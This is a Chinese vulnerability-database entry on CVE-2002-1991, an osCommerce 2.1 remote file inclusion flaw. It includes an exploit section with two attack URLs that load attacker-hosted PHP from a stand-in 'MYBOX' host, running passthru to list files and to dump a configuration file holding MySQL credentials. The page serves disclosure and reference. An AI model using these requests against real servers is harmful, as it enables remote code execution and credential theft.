OSCommerce远程文件包含漏洞

OSCommerce远程文件包含漏洞

漏洞ID 1106803 漏洞类型 代码注入
发布时间 2002-06-16 更新时间 2005-10-20
图片[1]-OSCommerce远程文件包含漏洞-安全小百科CVE编号 CVE-2002-1991
图片[2]-OSCommerce远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200212-536
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21563
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-536
|漏洞详情
osCommerce2.1版本存在PHP文件包含漏洞。该漏洞借助include_once.php的include_file参数执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/5037/info

osCommerce is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. 

-------- Example 1 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/a.php

--- a.php ---
<? passthru("/bin/ls")?>
-------------
Output: dir listing of the current dierctory
---------------------------

-------- Example 2 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/b.php

--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------
Output: outputs the application_top.php file wich includes MySQL username,
password, etc.
|参考资料

来源:www.oscommerce.com
链接:http://www.oscommerce.com/about.php/news,72
来源:BID
名称:5037
链接:http://www.securityfocus.com/bid/5037
来源:XF
名称:oscommerce-include-remote-files(9369)
链接:http://www.iss.net/security_center/static/9369.php

相关推荐: HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability

HP Web Jetadmin Remote Arbitrary Command Execution Vulnerability 漏洞ID 1098739 漏洞类型 Input Validation Error 发布时间 2004-03-24 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享